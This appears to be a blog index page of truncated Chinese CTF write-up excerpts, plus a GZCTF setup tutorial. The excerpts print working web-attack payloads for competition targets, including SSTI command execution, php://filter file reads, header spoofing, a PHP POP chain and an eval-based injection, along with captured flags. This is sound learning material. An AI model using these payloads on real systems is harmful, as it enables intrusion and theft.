DASCTF-WP
2025上半年赛1phpms扫目录发现git泄露,用githacker提一下 githacker --url http://5b45730d-cfab-4b87-bfa1-29a046ca06c4.node5.buuoj.cn:81/.git/ --output-folder C:\Users\25050\Downloads 历史修改记录中找到index.php源码 <?php$shell = $_GET['shell'];if(preg_match('/\x0a|\x0d/',$shell)){ echo ':(';}else{ eval("#$shell");}?> 发现很多函数都被禁用,但是原生类还可以用 shell=?><?php $a=new DirectoryIterator(".");foreach($a as $f){echo $f." "...
奇奇怪怪的教程
前言前天搭GZ台子的时候看了很多教程,也踩了很多坑,所以就想记录下自己的安装步骤 一.GZCTF搭建及web环境搭建1.docker安装(Windows)1.1docker下载英文版下载地址:Docker: Accelerated Container Application Development 汉化版下载地址:Release 4.42.0 · asxez/DockerDesktop-CN 如果下载汉化版,还要下载配置文件,到c盘中的安装路径(默认路径安装的话就为C:\Program Files\Docker\Docker\frontend\resources),替换原来的配置文件即可,原配置文件应该是appxxxx.asar这个名字 下载后安装的时候似乎没有其他多余选项了,直接下一步就行,但是路径目前不知道怎么修改,只有装在c盘 安装完成后重启电脑就行 1.2docker配置首次进入docker会要求登录账户,可以注册一个Docker hub的账户,也可以跳过 然后就去更换拉取的镜像源,默认是从Docker...
BUUCTF靶场
前言新开个靶场接着刷题,极客大挑战已经做过的就跳了,参考极客大挑战-WP | Yxing [ACTF2020 新生赛]Include根据tips中的文件包含直接伪协议 GET:file=php://filter/read=convert.base64-encode/resource=flag.php flag{99cbe927-0326-4ad0-9cbb-0d524fef23e3} [HCTF 2018]WarmUp源码提示source.php,直接访问,源码发现hint.php,也直接访问 //source.php<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist =...
CMCTF-WP
WEBpop<?phpclass A1{ public $a1;}class A2{ public $a2 = '10086';}class A3{ public $a3;}class A4{ public $a4;}$a=new A1();$a->a1=new A2();$a->a1->a2=new A3();$a->a1->a2->a3=new A4();echo...
HNCTF-WP
WEBDeceptiFlag看到隐藏元素,而且提示拼音,分别输xiyangyang,huitailang进入tips.php cookie中发现flag位置为/var/flag/flag.txt,随便尝试几个路径包含发现都不行,伪协议读取成功 //file=php://filter/read=convert.base64-encode/resource=tips.php//tips.php<?phpsession_start();// 为 PHP 7 添加 str_starts_with 函数兼容支持if (!function_exists('str_starts_with')) { function str_starts_with($haystack, $needle) { return strpos($haystack, $needle) === 0; }}if (!isset($_SESSION['verified']) ||...
LitCTF-WP
猫猫黑客小分队-yxing,mintlovectf,zhaowumian-42名 WEB星愿信箱尝试后发现是SSTI,但是过滤了{{}},用{%print%}绕过就行 {%print lipsum.__globals__.get('os').popen('tac /flag').read()%} NSSCTF{4a1bc0ff-4184-4832-8294-10b7838b30f2} nest_js参考漏洞预警 | Next.js 中间件鉴权绕过漏洞 (CVE-2025-29927) |...
米好信安挑战赛&黄河流域挑战赛-WP
米好信安挑战赛WEB1 尝试发现过滤__base__、单引号。旁路注入就行 GET:a=popen&b=tac+/flagPOST:content={{().__class__.__mro__[1].__subclasses__()[132].__init__.__globals__[request.args.a](request.args.b).read()}} flag{45f262f8515a42a85400321eccae7f0b} CRYPTO2先爆破密码得到密码为123456 我们截获到了一段密文:zhq rop sb lpgh mcqm cit tab。 已知以下条件: 使用的型号为 M3。 接线板设置为:ab cd ef gh ij kl mn op qr st。 反射器使用的是 UKW-B。 反射器的位置设置为 3,环设置为 5。 三个转子的设置分别为: ○ 第一个转子:rotor1 为 II,位置(position1)为 4,环(ring1)为 6。 ○ 第二个转子:rotor2 为...
轩辕杯-WP
WEBezjs import requestsurl="http://27.25.151.26:53243/getflag.php"payload="score=100000000000"headers={'Content-Type':...
帕鲁杯-WP
WEBCatBank逻辑漏洞,允许余额为负值,那么多注册几个账号后相互转账,到一百万时获得flag palu{0a2c13c6a72e4429a5ef89057f01ee16} CatNet扫目录发现/admin路由,提示本地访问,添加X-Forwarded-For:127.0.0.1,响应包中看到需要带上X-Internal-Auth:cateye-internal-000去访问/flag,但是错误,爆破数字在123时获得flag palu{e60ed7efcfe648b09439e4334b319e6e} ezblog(复现)反编译dashboard.class获得如下源码,但是不知道怎么找realkey package com.example.demo.Controller;import org.noear.solon.annotation.Controller;import org.noear.solon.annotation.Mapping;import...
CTBUCTF-WP
WEBWelcome !! ctbuctf{we1c0me_t0_CT9UC7F2025} Sql_No_map…?原先还在自己测,结果发现目录有东西…… //index.php<?phprequire 'lib.php';header("Content-Type: text/html; charset=utf-8");$err = '';$selected_id = $_GET['id'] ?? '';$selected_article = null;// 获取文章列表$list_sql = "SELECT id, title FROM article ORDER BY id ASC"; //升序排列$list_res = db()->query($list_sql);$articles = [];while ($row = $list_res->fetch_assoc()) { $articles[]...